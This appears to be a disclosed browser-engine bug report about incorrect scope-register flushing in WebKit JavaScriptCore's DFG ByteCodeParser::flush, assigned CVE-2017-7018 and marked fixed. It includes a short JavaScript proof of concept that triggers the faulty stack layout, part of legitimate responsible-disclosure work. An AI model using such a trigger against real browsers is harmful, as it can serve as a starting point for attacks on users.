New issue
Advanced search Search tips
Starred by 2 users
Status: Fixed
Owner:
Closed: Jul 24
Cc:



Sign in to add a comment
WebKit: JSC: Incorrect scope register handling in DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry)
Project Member Reported by lokihardt@google.com, Apr 10 2017 Back to list
Here's a snippet of DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry).

void flush(InlineStackEntry* inlineStackEntry)
{
	...
    if (m_graph.needsScopeRegister())
        flush(m_codeBlock->scopeRegister()); <<--- (a)
}

At (a), it should flush the scope register of |inlineStackEntry->m_codeBlock| instead of |m_codeBlock|. But it doesn't. As a result, the scope register of |inlineStackEntry->m_codeBlock| may have an incorrect offset in the stack layout phase.

PoC:
function f() {
    (function () {
    	eval('1');
    	f();
    }());

    throw 1;
}

f();



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 
Project Member Comment 1 by lokihardt@google.com, Apr 10 2017
Project Member Comment 2 by lokihardt@google.com, Jun 28
Labels: Deadline-Grace
Project Member Comment 3 by lokihardt@google.com, Jul 13
Labels: CVE-2017-7018
Comment 4 Deleted
Project Member Comment 5 by lokihardt@google.com, Jul 24
My analysis was a little wrong. They fixed this just by inserting 6 characters: "flushDirect(m_codeBlock->scopeRegister());".
Project Member Comment 6 by lokihardt@google.com, Jul 24
Labels: -Restrict-View-Commit
Status: Fixed
Sign in to add a comment